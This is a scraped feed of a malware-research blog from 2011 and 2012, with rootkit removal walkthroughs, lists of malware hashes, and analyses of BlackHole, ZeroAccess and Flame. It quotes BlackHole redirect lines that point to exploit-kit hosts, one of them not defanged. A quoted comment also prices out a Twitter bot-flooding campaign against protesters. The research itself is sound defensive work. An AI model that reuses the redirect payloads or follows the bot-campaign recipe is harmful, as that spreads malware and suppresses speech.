Quantcast
Channel: A blog about rootkits research and the Windows kernel
Viewing all 58 articles
Browse latest View live

TDL FS dumper's

November 15, 2011, 10:27 am
$
0
0
Kaspersky tdsskiller http://support.kaspersky.com/downloads/utils/tdsskiller.exe
ESET tdlfsreader http://eset.ru/tools/TdlFsReader.exe

tdsskiller first
First, edit options

"Checking TDL FS" to On

Performing scanning..

Rootkit was found...

For "TDSS File System" not skip, set to "copy to quarantine"

Go to tdsskiller log in root of system volume, C:


Files of rootkit were saved to %system_volume%:\TDSSKiller_Quarantine\Data_and_Time\.

Directory with dumped objects: .dta -  dumped objects, .ini - info about dumped object 

Try tdlfsreader next

Objects were dumped to TDL_FS dir in current folder.

Search

ZeroAccess detection with Xuetr tool

November 16, 2011, 5:41 am
$
0
0
Xuetr is a powerfull tool for hide_code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip).
Run it on machine that was infected of latest ZeroAccess rootkit.

After we run it, shows alert.

Next, look to "Kernel module" tab.

Xuetr found two drivers of ZeroAccess, we can dumped it...

Next, checking kernel on suspicious actions - Kernel->Object Hijack.


Look that system driver - ipsec.sys was hijacked, also some pointers in device object of hard drive disk were hijacked.


IPsec service in registry, from where rootkit started...





Necurs rootkit detection

November 17, 2011, 3:00 am
$
0
0
Detailed information (and droppers too) available on
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=897
http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859

Block drivers of many AV tools.

 GMER

 tdsskiller


 Xuetr

Rku

After was started, creates device NtSecureSys.


Detection (for example, with VBA Antirootkit).

Kernel modules


Stack of devices, attaches itself to Tcp dev


Hooks NtOpenProcess, NtOpenThread functions in SSDT


Registers registry callback for self-defence and load module notify for disable of AV drivers loading.


Rootkit driver locked on disk.

Tdsskiller in your hands for deletion :)

Skip error message


Perform scanning

Malicious service was detected, set action to "delete".


Reboot need...

New BlackHole features

November 22, 2011, 4:53 pm
$
0
0
I looked MDL today and suddenly discovered the following:


New method of BlackHole spreading. js has the form:

document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';

ISC wrote about that and that BlackHole spreads ZeroAccess/Sirefef now.

Further, information from this note http://isc.sans.edu/diary/Updates+on+ZeroAccess+and+BlackHole+front+/12079


So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.

BlackHole panel

The most common method used by BlackHole to spread is via links inside phishing emails.

For example:

1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website

But recently they improved this method by adding another layer:

1) Phishing email contains a link to a website
2) The website contains four links like:

 #h1#WAIT PLEASE#/h1#

 #h3#Loading...#/h3#

#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#

 3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:

-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';

That makes really easy for the author to update to new websites, and at the same time, make it harder for a takedown.
After that you already know what happens, it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...

That bring us to the second update: ZeroAccess

ZeroAccess it not something new...in fact it is been around for some years, but it is showing some very interesting development. One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.

Russian's election - hall of shame

December 9, 2011, 10:18 am
$
0
0
1) In the day of election.

Intermediate results:


146,47 % - Special wrapping for pro-Kremlin party.

2) DDos attacks on social networks and media, such as, St. Petersburg Novaya Gazeta, KartaNarusheniy.ru, Golos.org, LiveJournal, Twitter, NewTimes.ru.

http://globalvoicesonline.org/2011/12/05/russia-election-day-ddos-alypse/


I asked Group-IB (Russian cyber crimes investigation lab) about investigation of this incident. But answer is obvious...

3) Wave of arrests and detentions protesting.



4) Detention of Navalny.
http://www.itar-tass.com/c32/290980.html

5)

Thousands of Twitter accounts apparently created in advance to blast automated messages are being used to drown out Tweets sent by bloggers and activists this week who are protesting the disputed parliamentary elections in Russia, security experts said.

http://krebsonsecurity.com/2011/12/twitter-bots-drown-out-anti-kremlin-tweets/


Russians fight Twitter and Facebook battles over Putin election
Protests against president's party escalate across social media with flood of automated counterattacks and alleged hacking


http://www.guardian.co.uk/world/2011/dec/09/russia-putin-twitter-facebook-battles

6) DDos attacks on Brian Krebs Twitter account. A huge number of followers every second.

7) Founder of vkontakte.ru Pavel Durov has been summoned for interrogation by the FSB (aka KGB).


This country is still in the hands of the KGB...

UPDATE: Full list of bots against manifestations http://ec2-50-19-134-213.compute-1.amazonaws.com/users.txt.

How does Twitter attacks can be implemented: (Neej)

For anyone that doesn’t know this type of attack (if it can be called that) can be done cheaper than you may think – peanuts in fact.

Although I imagine it’s likely that customised tools were used for this, if you yourself wanted to do this:

$150 will get you a license for the TweetAttacks Pro application which automates posting pretty much how you want – it automates adding real looking content using services such as SocialOomph (or any other website actually). It uses a web browser to do all its work making it undetectable by Twitter. It includes an account creator which can offload captcha solving to third parties ($1.50 per 1000 if you chose the Death By Captcha Service for example).

In addition to mount an attack using 1000′s of accounts private proxies are required – Brian has already done articles on criminal activity surrounding the provision of such services however there are longstanding (whitehat I’m assuming) companies which will lease you http proxies for $1 per proxy per month – the price goes down as you order more of course. So let’s say you use 100 Twitter accounts per proxy – another $100 if you chose to attack using 5000 Twitter accounts. (you probably only need them for a month if all you wish to do is do this attack but I went two months so you can dribble out tweets like happened in the real thing to make the accounts look real).

And lastly you need a moderately powerful server – nothing too extreme by any means. Say you wanted high levels of service – you could rent a OVH Kimsufi KS16G dedicated server for ~75USD (theyre priced in Euros so depends on exchange rates).

This server is probably massive overkill and could be had for a lot less. Add $15 or so (?) for a Windows license however many people just run Windows inside a VM to avoid this added cost.

Spend some time setting up your software (this will take a fair amount of time from my experience using Twitter to market solutions to people – but it can easily be outsourced through Teamviewer or other methods for peanuts) and there you go: your own Twitter blasting machine for ~$300 USD (likely less if you went for less powerful hardware) that you can overwhelm any movement you don’t happen to like.

Social media can be a great thing but at the same time it has a tremendous capacity to be gamed.

SpyEye removing with Xuetr tool

December 22, 2011, 10:40 pm
$
0
0
SpyEye is a famous trojan that steals your private data.
Also known as EyeStye (Microsoft), Pincav (Kaspersky).
Can be identified by any anti-rootkit: only user-mode hooks, no driver.
Purpose of hooks is self-defence: hides registry keys from it starts, hides file on disk and intercepts private information.
A lot of hooks in processes.

Registers itself in autorun at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

Hidden autostart item.

Hidden directory with module.

Instructions for remove: delete autorun item from registry and hidden folder on disk. After reboot, your system is clean.

Was discussed here http://www.kernelmode.info/forum/viewtopic.php?f=16&t=93.


DorkBot/NgrBot removing

December 25, 2011, 4:47 am
$
0
0
Worm:Win32/Dorkbot.I - worm, based on IRC communication (DorkBot family) with a backdoor features.

Also known as NgrBot, IRCBot.

Like SpyEye may capture private user data, such as user names and passwords. Threat may block some security websites.

Also like SpyEye hides it data and actions from your eyes with user-mode rootkit component. No driver on board and will be detected with any anti-rootkit.

Hooks:


Installs itself to %AppData% dir and, after reboot, loads from
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

Also download other threats (Zeus, in my case, zaberg.exe)

Hidden files and keys:



For remove (with Xuetr):

Set special settings that will disable some features of malware action:


Next, delete files, including downloaded, and registry values.

After that, perform special reboot.





Top threats at last two weeks (20 Dec '11 - 3 Jan '12)

January 3, 2012, 12:34 am
$
0
0
20 Dec '11 - 3 Jan '12
  • New wave of Sinowal/Mebroot spreads.
  • Wave of French ransoms - Trojan Ransom.
  • At start of first week - Winlock/WindowsSecurity.
  • FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware 2012, XP Home Security 2012.
  • ZeroAccess/Sirefef rootkit.
Sources:
  • tracking malware links - VxVault, MDL
  • kernelmode
Search

Top threats of the week 3 Jan '12 - 7 Jan '12

January 7, 2012, 1:35 am
$
0
0

3 Jan '12 - 7 Jan '12
  • Sinowal/Mebroot.
  • NgrBot/DorkBot/IRCBot.
  • Caphaw.A - Backdoor.
  • Password stealers (ZBot/SpyEye).
  • Ramnit.
  • Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.
  • Cridex.

BlackHole spreads more and more malware

January 13, 2012, 7:10 am
$
0
0
Trend of the last weeks is a BlackHole and that it spreads a lot of types of malware. In fact it password stealers and ransomware with which attackers get the most profit.

So, the most widespread BH payload is:

  • GEMA ransomware - Trojan:Win32/Lockscreen.BO.
  • Win32/Sinowal rootkit with password stealer payload.
  • Ramnit password stealer.
  • FakeRean - Fake AV with various GUI covers.
  • ZBot/SpyEye - similar password stealers (including, Trojan:Win32/Bublik.B).
  • Reveton.A - private data stealer.

Top threats of the month, Jan 2012

January 26, 2012, 11:30 pm
$
0
0
At first month of new 2012 year were observed, in general, a lot of various ransomware, fake antiviruses and passwords stealers. At first quarter of January there was new type of ransomware - Reveton. It spreads via BlackHole EK and is a downloader of ransomware/malicious html-pages (with js) on various languages (Italian, Spanish, German, UK and French).


From fake AV most active were FakeRean, that has a new covers and spread also from BH.
As usual active were FakePoliceAlert ransomware - French, that replaces explorer.exe file, GEMA and "Firefox" - ransomware for German users.

GEMA has a view.

French.

So, threats are:
  • FakeAV (Defmid, FakeRean, FakeScanti, FakeSysdef, FakeVimes, Winwebsec).
  • Ransomware: Reveton, French, GEMA, German.
  • Sinowal passwords stealer with bootkit component, was observed via BH.
  • Various passwords stealers, including OnlineGames-like and ZBot-like, including self ZBot.
  • SpyEye (also samples with FUD).
  • Caphaw.A backdoor.
  • ZeroAccess.
Note: All threats were observed with help of public malware sources trackers and honeypots.

New ZBot modifications

April 3, 2012, 5:00 am
$
0
0
MD5: B52BD5D6B18A0A46FA062269BE3B639F
SHA1: 104681a106148e47970ac6c31e83009640ed532b

MD5: 376EC224F2931544E1A7C0703085B9DD
SHA1: ed6a50d67e5e44e22c8950395f78102661a1a32e

MD5: 3901D2623144A165504AB147D0207B9D
SHA1: d80d65b1872938a54d6afc7226e6c95586bd32cf

MD5: 316A63E703BB62F08A5C00970A07B34B
SHA1: 17b13007a14451debba7116d8954c3e0f1329976

MD5: 8CDFF7D279237507EBE2051E2FA5D030
SHA1: 13cec609e243b09ed692d69ee80d78db8ce96120

BlackHole spreads ZeroAccess/Sirefef

April 8, 2012, 6:35 am
$
0
0
With Kafeine observed that BlackHole group that is distributed Carberp in past, now distribute ZeroAccess.
All samples were with FUD status. Couple of hashes:

MD5: 4f7c964fe7011de17ccbce326591586f
SHA1: 455c6a11670bf84550321848907dc7168a130fc1

MD5: 97d8618d933cbc4deae3c3d3e462992a
SHA1: dbdca3a297d91681cfe67145ecd3ea15afea051c

MD5: ce6bb1d60acb1b2f3ba208f7276ef4e6
SHA1: 0023f1f7749f5f2a917c0e6cd56fcdfe4de3d27e

Комьюнити: Microsoft нарушила правила в деле ликвидации ZBot

April 17, 2012, 1:42 am
$
0
0
Начало истории, вкратце:
http://www.anti-malware.ru/forum/index.php?showtopic=21983

Microsoft решила нанести удар (disrupt) по инфраструктуре ботнета, боты которого основаны на оригинальных кодах ZBot/SpyEye. Произошло это, конец марта, 25 число.

Основная суть:
http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx

Материалы для ознакомления (заявления):
http://www.zeuslegalnotice.com/
Особенно: http://www.zeuslegalnotice.com/images/Summons.pdf

Предполагалось, что как и в предыдущих случаях ликвидации ботнетов, MS передаст эти данные правоохранительным органам для дальнейшего расследования.

Однако, Fox-IT http://blog.fox-it.com/2012/04/12/critical-analysis-of-microsoft-operation-b71/
указала неточности (по их мнению) этой операции Microsoft. Кроме каких-то технических деталей захвата серверов и подставных доменов, они обратили внимание на информацию об обвиняемых (defendants) и откуда удалось ее получить, а также о хитросплетениях кодов ботов и их версий. Заметьте, что такая информация прежде не публиковалась. Вот этот последний пункт и заставил Microsoft объяснить сообществу, как информация из андерграунда выплыла на поверхность.

Отбросим сейчас все, что мы знаем об авторах, ботах и прочего и посмотрим на ситуацию немного под другим углом.

Фокс-ИТ пишет:
In the affidavits you can find a great deal of that information that is freely available on the Internet. It is interesting to notice that this is presented as verifiable facts just because it was available on a website or as download. These websites and documents are statements of questionable source and it goes too far to actually go into every detail of each paper, but when I was reading it I found many presented facts which I know to be incorrect. For example one of the included whitepapers states that the latest version at the time of writing in 2010 of the ZeuS Trojan would be version 1.6, which is simply false. The last ZeuS version in the major version 1, is actually 1.3.X.X which was released by the end of 2009 and further updated with fixed in the beginning of 2010. And version 1.4 was actually never really released and not for sale, but was merely the beta version for the 2.0 release which was released in 2010.

Самое главное:

This last part [John Does information] brings us on the most interesting part of this whole write up on operation b71, we were surprised to see the contents of the Summons.pdf and the declaration of Debenham. This includes a lot of information on actors involved within the ZeuS operations, the SpyEye author and individual SpyEye users but also completely unrelated actors. This information includes nicknames, email addresses, icq numbers and jabber addresses.


And when looking at those details we found some interesting details on some of the described john doe’s. The information therein was 100% identical to information we had supplied to a certain mailing list. This mailing list has the restriction that data being shared can only be used with the permission of the person who supplied that data. The information was in exactly the same order and contained exactly the same amount of information on those john does that we and also a friendly information security company had provided. Since the order and amount of information was 100% identical, and the data then also being used out of context and misinterpreted, meant that the person who interpreted it did not have the right background to fully understand the data.


For us this felt as a major blow as we spent a lot of time in getting this kind of information, while a corporate giant like Microsoft is now using this information without reaching out to the persons who supplied that information, for their own marketing and public relation purposes. From our end we can confirm that this information was never supplied for the purposes that Microsoft used it for. This whole action of Microsoft brings a major blow to the entire information sharing between information security companies on mailing lists and working groups.


Перевод:



Эта последняя часть [имеется в виду информация о Джонах Доу] самая удивительная из всего, что было написано про операцию b71, мы были удивлены, увидев содержимое Summons.pdf и объявления Debenham. Эти части включают в себя не только много информации о действующих лицах в истории ZeuS, SpyEye, включая авторов и индивидуальных пользователей, но и совершенно не связанных с ними лиц. Эта информация включает в себя ники, адреса электронной почты, ICQ и Jabber номера и адреса.

И глядя на эти детали, мы обнаружили некоторые интересные подробности о некоторых Джонах Доу. Информация в документе была на 100% идентична той, которую мы рассылали в определенную рассылку. Этот список рассылки имеет ограничение на данные, о которых идет речь и они могут быть использованы только с согласия лица, предоставившего эти данные. Эта информация [опубликованная Microsoft] была фактически идентична и содержала точно такой же объем информации о тех же Джонах Доу, а также содержала информацию дружуственных нам компаний по информационной безопасности. Поскольку информация была идентична на 100%, а данные затем используются вне того контекста и неправильно были истолкованы, в свою очередь означает, что человек, который их интерпретировал не имел общей картины для их правильного истолкования.

Мы ощутили это как сильный удар, так как мы потратили много времени на получение такого рода информации, в то время как корпоративный гигант - Microsoft теперь использует эту информацию, не упоминая лиц, которые ее поставляли, для достижения своих маркетинговых целей, а также общественных отношений. С нашей стороны, мы можем подтвердить, что эта информация никогда не поставлялась в целях, которые Microsoft использовала для этого. Все эти действия Microsoft наносят серьезный удар по всей структуре обмена информацией между компаниями информационной безопасности в списках рассылки и рабочих групп.

Итак очевидно, что Microsoft (вернее DCU - Digital Crimes Unit) должна объяснится, что она и сделала, см
Кроме того, считается что Microsoft побежала впереди поезда предъявляя гражданские иски вышеназванным Джонам Доу.

Malware collection and research

April 20, 2012, 5:44 am
$
0
0
Guys, I collected malware at last few month. If you need information or MD5 or samples for research purposes, leave message at post or send message at my VT profile at https://www.virustotal.com/user/rkhunter/ (if you are part of VT community).

In general it includes:

- Caphaw backdoor
- Carberp
- Cridex
- Dorkbot/Ngrbot
- Drstwex
- FakeAV
     - Defmid
     - FakeRean
     - FakeSysdef
     - FakeVimes
     - Winwebsec
- Fareit passwords stealer
- Gamarue
- IRCBot
- Ransomware
     - FakePoliceAlert
     - GEMA (Ransirac)
     - French (Ransom.FL)
     - WindowsSecurity
     - Reveton
- Ramnit
- Simda backdoor
- Sinowal
- SpyEye
- ZBot/Zeus

- ZeroAccess
- Ursnif

Search

Буткиты - тренд выживания малвари в современных условиях

May 7, 2012, 11:37 am
$
0
0
Итак коротко, по сути и расставляя акценты в нужных местах.
В начале обратимся к тому, что писал Symantec уже почти год назад. Статья называлась Are MBR Infections Back in Fashion? (Инфицирование MBR возвращается в моду?) 
Перевожу их материал, потому что в нем много полезной информации. С помощью него же можно собрать в голове материал по буткитам в какую-то общую картину.
Symantec пишет:

Заражение MBR открывает большие возможности для дальнейшего глубокого заражения компьютера, а также получения контроля над ним, что делает эту идею привлекательной для малваре-писателей. Современные методы заражения MBR являются довольно сложной задачей, которая под силу не всем авторам малвари, а только высококвалифицированным. Вероятно, это одна из причин, из-за которой у создателей Trojan.Mebroot не появилось так много последователей, после того как техника инфицирования MBR была вновь открыта в 2007 (основываясь на работах, выполненных eEye Digital Security в 2005 в проекте BootRoot). Mebroot был сложной малварью, он также имел прямой доступ к диску для записи своего кода в его сектора, ставя таким образом ОС в неведение о своем существовании. Такой тип низкоуровневого заражения в сочетании со сложной руткит-составляющей делает его трудным для идентификации и лечения. Путь к победе над ним состоит в том, чтобы получить доступ к диску минуя перехваты руткита или получить управление до того, как зараженная MBR будет исполнена.
В то время как заражение MBR было опорой для Mebroot с самого начала, другая банда, которая несет ответственность за такую сложную угрозу как Backdoor.Tidserv (первоначально заражающей драйверы) решили что они также будут иметь дело с MBR. Они взяли на вооружение механизм заражения MBR летом 2010 для версий Backdoor.Tidserv.L и последующих. Наряду с Mebroot и Tidserv также появилось ряд других угроз между 2008 и 2010, которые использовали метод заражения MBR, например, Trojan.Mebratix и Trojan.Bootlock.
Перенесемся в наше время, картина малвари, заражающей MBR значительно изменилась. К 2011 мы видели такие угрозы как: Backdoor.Tidserv.M, Trojan.Smitnyl, Trojan.Fispboot, Trojan.Alworo, и Trojan.Cidox. Эта статистика показывает увеличение количества малвари, использующей бутовый период выполнения (в частности, использование MBR) как путь заражения машин.Следует также отметить, что значительная часть наработок для буткитов уже была сделана исследователями ранее. Когда исследователи опубликовали детали BootRoot и VBootkit, авторы малвари буквально взяли эти наработки и PoC'и и просто адаптировали их для своих нужд.В соответствии с нашими наблюдениями, мы можем сказать, что значительное количество семейств малвари, заражающей MBR, заимствовали эту технику у концептуального проекта - BootRoot. Появление мало живущих по времени вымогателей (MBRLock) придали вес этой идее. Вымогатели сделаны для единственной цели и не ожидается от них длительного срока работы, так что люди, которые их пишут не хотят тратить много времени и усилий в их создание, а также скрытие на машине. Это резко контрастирует с более продвинутыми примерами бэкдоров, создатели которых пытаются построить полезную и прочную зомби-сеть для извлечения прибыли. Это признак того, что барьер для прихода такого типа малвари был снижен. На текущий момент, вся последняя малварь, атакующая бутовый период исполнения нацелена именно на MBR, за исключением Trojan.Cidox, который использует несколько другой подход. Вместо MBR, он заражает Initial Program Loader для достижения похожего общего эффекта.


Итак, главные возможности, которые обеспечивают буткиты (или малварь бутового периода исполнения):
  • Возможность стартовать раньше ОС, т. о. получать контроль над ней.
  • Как следствие первого пункта, скрывать малварный пейлоад от AV-детекторов (которые используют возможности ОС).
  • Практически единственная возможность стартовать свой код режима ядра в x64.

Flamer goes ITW

May 29, 2012, 11:59 am
$
0
0
Original CrySys very detailed and useful research http://www.crysys.hu/skywiper/skywiper.pdf.

CrySys report was updated with adding of Kaspersky info about mssecmgr.ocx structure.


On infected machine (symptoms of infection):




Kaspersky - Stuxnet dropper contains Flame-liked component in resource http://www.securelist.com/en/blog/208193568/Back_to_Stuxnet_the_missing_link


Stuxnet orig dropper

MD5: 2fb979eb3e8d8b1571cdd0df33427969
SHA1: 46104bf26300a5fb7a4f799d80e141b95465d0cc
File size: 611840 bytes

Unpacked/decrypted

MD5: 2f4e30a497ae6183aabfe8ba23068c1b
SHA1: 1df6ae2a5594ab29a6e60b6d9296128b1f9fd980
File size: 1603072 bytes

MD5: 7d49d4a9d7f0954a970d02e5e1d85b6b
SHA1: e6c671bc74d638cc2aa5cce656d8e1461dc7bb79
File size: 458869 bytes
File name: browse32.ocx

MD5: 2512321f27a05344867f381f632277d8
SHA1: 2909e3aec7ce35a7646e94ae9f0a32589d01d5d3
File size: 729536 bytes
File name: msglu32.ocx

Flamer has uninstaller module [browse32.ocx] - Symantec http://www.symantec.com/connect/blogs/flamer-urgent-suicide

MD5: 1f61d280067e2564999cac20e386041c
SHA1: d36fad73c6aeff98906008f3eb5a16812cc3188a
File size: 29928 bytes
and


Microsoft Security Advisory (2718704)
Unauthorized Digital Certificates Could Allow Spoofing
http://technet.microsoft.com/en-us/security/advisory/2718704
http://support.microsoft.com/kb/2718704


MD5: bddbc6974eb8279613b833804eda12f9
SHA1: 93d6f85e369f92ba369fb90ce85f371663f9b700
File size: 188416 bytes
File name: component - PE-exe (service) that was extracted from mscrypt.dat (c4d1ca8dd6ada3eb1c5eb507516f7c84).
Timestamp - 30 Jul 2008

MD5: b51424138d72d343f22d03438fc9ced5
SHA1: 6afb715831477625d4889482840c2fef3e8d2648
File size: 892417 bytes
File name: MSSECMGR.OCX

MD5: 0a17040c18a6646d485bde9ce899789f
SHA1: edac8c89813327101a611a13e46f18dcd44a8c23
File size: 1236992 bytes
Date: 2012-05-30 12:45:05 UTC
File name: MSSECMGR.OCX

MD5: e5a49547191e16b0a69f633e16b96560
SHA1: f6a3ebbd2e6d6c1f470af5c823daf2b938819152
File size: 1236992 bytes
Date: 2012-05-30 14:22:32 UTC
File name: MSSECMGR.OCX

MD5: 2afaab2840e4ba6af0e5fa744cd8f41f
SHA1: e26a176c88cd57cdddce2960d604c0d95a8bf9a0
FIle size: 116224 bytes
Date: 2009-05-21 03:01:33 UTC

MD5: 6f7325bb482885e8b85acddec685f7fa
SHA1: f3cb38d85c562136279eeec8c22ebf1e68fcd2fd
File size: 146944 bytes
Date: 2009-12-22 08:36:23 UTC

MD5: 7a2eded2c5d8bd70e1036fb5f81c82d2
SHA1: 8cd71cf5a45654e12a0e821b8f7bc66af82e7856
File size: 146944 bytes
Date: 2009-12-22 09:27:31 UTC

MD5: ee4b589a7b5d56ada10d9a15f81dada9
SHA1: 005a0a4a931333f05dc16c73224e5b9b42e83836
File size: 391168 bytes
ITW date: 2009-07-29 08:45:52 UTC

MD5: 20732c97ef66dd97389e219fc0182cb5
SHA1: 40516c37c60b1e9837ab9c1397b628a4fde24e63
File size: 634880 bytes
File name: comspol32.ocx
ITW date: 2010-07-20 13:41:34 UTC

MD5: 8ed3846d189c51c6a0d69bdc4e66c1a5
SHA1: a7e0118c0479298f2ba6d8bed118367368ffa1e3
File size: 421888 bytes
File name: advnetcfg.ocx

MD5: f0a654f7c485ae195ccf81a72fe083a2
SHA1: 9c376b014225a708e9bcdc3cce2dc463d65e405f
File size: 643944 bytes
ITW date: 2012-05-28 14:37:54 UTC
File name: advnetcfg.ocx


MD5: bb5441af1e1741fca600e9c433cb1550
SHA1: 60d5dbddae21ecb4cfb601a2586dae776ca973ef
File size: 643072 bytes
File name: advnetcfg.ocx
ITW date: 2011-05-15 04:31:30 UTC

MD5: 296e04abb00ea5f18ba021c34e486746
SHA1: 5fdd7f613db43a5b0dbec8583d30ea7064983106
File size: 160768 bytes
File name: soapr32.ocx
ITW date [MIS first upload]: 2012-05-29 00:42:43 UTC

MD5: c9e00c9d94d1a790d5923b050b0bd741
SHA1: 7105b17d07fd5b30d5386862a3b9cc1ff53a2398
File size: 827392 bytes
File name: nteps32.ocx
ITW date: 2012-05-28 05:42:31 UTC

MD5: c81d037b723adc43e3ee17b1eee9d6cc
SHA1: d4b21620d68fdc44caa20362a417b251ff833761
File size: 1300 bytes
File name: boot32drv.sys
ITW date: 2012-05-28 06:10:10 UTC

MD5: bdc9e04388bda8527b398a8c34667e18
SHA1: a592d49ff32fe130591ecfde006ffa4fb34140d5
File size: 6166528 bytes
File name: mssecmgr.ocx
ITW date: 2012-05-29 00:40:44 UTC

MD5: 5ad73d2e4e33bb84155ee4b35fbefc2b
SHA1: faaef4933e5f738e2abaff3089d36801dd871e89
File size: 53534 bytes
File name: ccalc32.sys
ITW date: 2012-05-28 15:01:01 UTC

MD5: d53b39fb50841ff163f6e9cfd8b52c2e
SHA1: 3a9ac7cd49e10a922abce365f88a6f894f7f1e9e
File size: 1721856 bytes
File name: msglu32.ocx
ITW date: 2012-05-29 00:28:45 UTC

MD5: 37c97c908706969b2e3addf70b68dc13
SHA1: 2d3e5e896c93ea2c852ad4a3ab95655c27388330
File size: 6172160 bytes
ITW date: 2012-05-30 01:43:30 UTC

Aliases:
CrySys: sKyWIper
MS: Worm:Win32/Flame.A
Kaspersky: Worm.Win32.Flame.a
Symantec: W32.Flamer
McAfee: SkyWiper

mssecmgr.ocx by McAfee http://blogs.mcafee.com/enterprise/security-perspectives/skywiper-fanning-the-flames-of-cyber-warfare
soapr32.ocx analyse http://stratsec.blogspot.com/2012/05/flame-component-soapr32ocx.html
msglu32.ocx analyse http://stratsec.blogspot.com/2012/05/flame-msglu32ocx-component-that-can.html
mssecmgr.ocx description by Kaspersky http://www.securelist.com/en/blog/208193538/Flame_Bunny_Frog_Munch_and_BeetleJuice
mssecmgr.ocx by Symantec http://www.symantec.com/connect/blogs/painting-picture-w32flamer

hashes by Sophos http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Flame-Gen/detailed-analysis.aspx

Another hashes and dates info http://labs.alienvault.com/labs/index.php/2012/how-old-is-flame/
Hashes and dates by McAfee http://blogs.mcafee.com/mcafee-labs/what-the-skywiper-files-tell-us

Symantec: http://www.symantec.com/connect/blogs/flamer-highly-sophisticated-and-discreet-threat-targets-middle-east
Flamer: A Recipe for Bluetoothache http://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

Kaspersky: http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers
Flame: Replication via Windows Update MITM proxy server http://www.securelist.com/en/blog/208193566/Flame_Replication_via_Windows_Update_MITM_proxy_server

Tool for removal from BitDefender http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

W32.Flamer: Spreading Mechanism Tricks and Exploits http://www.symantec.com/connect/blogs/w32flamer-spreading-mechanism-tricks-and-exploits

Bit9: https://www.bit9.com/files/Threat_Advisor_Flame_FINAL.pdf

List of hashes will be updated...
#malware #cyberwar #APT

ZeroAccess - new steps in evolution

June 22, 2012, 4:11 am
$
0
0
Already since a month ago ZeroAccess was updated. As we remember in previous versions it contained rootkit with VFS functionality and also modern self-defence method from AV-scanners. Also it infected drivers by hijacking it file from disk.
After that version with ring0-rootkit, rootkit was deleted from malware droppers [and seems from malware project too]. In this version malware guys changed the technique of active infection, targeting it to user mode whole. It uses this run key for autostart:

Also you can check it presence by files/directories:

C:\WINDOWS\assembly\GAC\Desktop.ini
C:\WINDOWS\Installer\{UUID}\@
C:\WINDOWS\Installer\{UUID}\n
C:\WINDOWS\Installer\{UUID}\L\
C:\WINDOWS\Installer\{UUID}\U\
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}\L
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}\U



Currently, they changed tactics again. Now ZeroAccess has cross-platform file-infector. As infector, it targeted to system file - services.exe, look http://en.wikipedia.org/wiki/Service_Control_Manager.
It infects this file in x32 as well as x64. 
x32 Infected services has view:
As you can see shellcode was injected to ScRegisterTCPEndpoint function. 
Moreover, ZeroAccess stores loader of main payload in ExtendedAttribute of file (additional NTFS attribute). 
Shellcode from ScRegisterTCPEndpoint reads Ea to buffer and transfers control to it. In Ea stores another shellcode - miniloader and PE file - dll. 
Shellcode from ScRegisterTCPEndpoint transfers execution to shellcode from Ea.


Shellcode from Ea has view:

It main purpose - extract dll from Ea and load it.

Dropper:

MD5: c6e73a75284507a41da8bef0db342400
SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f

And of course AV-guys were fast as possible :(


Removing Pushbot worm with your hands

June 24, 2012, 6:22 am
$
0
0
Research belongs to fresh version of Pushbot worm - Worm:Win32/Pushbot.VR.

Dropper:

MD5: 3e50b76c0066c314d224f4fd4cbf14d5
SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a

Infects via facebook spreading company. Detailed -  http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1385&start=10#p14221.

Copies itself to
C:\Documents and Settings\root\Local Settings\Application Data\random
C:\Documents and Settings\root\Start Menu\Programs\Startup\random

Runs from
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\random

List of processes for infection in memory:
msnmsgr.exe
msmsgs.exe
opera.exe
skype.exe
firefox.exe
iexplore.exe
calc.exe
jusched.exe
explorer.exe

Instructions for remove:

1. Suspend all processes in the list above for stop action of injected code.


2. Kill main module - process that always resident in memory.

3. Kill all processes that you've suspended
4. Run explorer.exe.

5. Remove main malware's module from two places.
6. Run regedit and remove autostart item.

7. Reboot.

Interesting malware of the month: trends and hashes

July 7, 2012, 9:15 am
$
0
0

Interesting malware that already discussed at last month.

1. ZeroAccess/Sirefef was updated. With feature of cross-platform file-infector and shellcode.

SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f
MD5: c6e73a75284507a41da8bef0db342400

2. Stuxnet droppers with Flamer proto-component inside.

SHA1: 46104bf26300a5fb7a4f799d80e141b95465d0cc
MD5: 2fb979eb3e8d8b1571cdd0df33427969

SHA1: 6da3bb3face857638d0af027f52933b037e48c57
MD5: d705ae2f0b0a21e48d42c6ffdf5a171c

3. ZBot droppers with original anti-emu crypter/packer.

SHA1: 01125257e3baf7132345d93e60560cd19ca29914
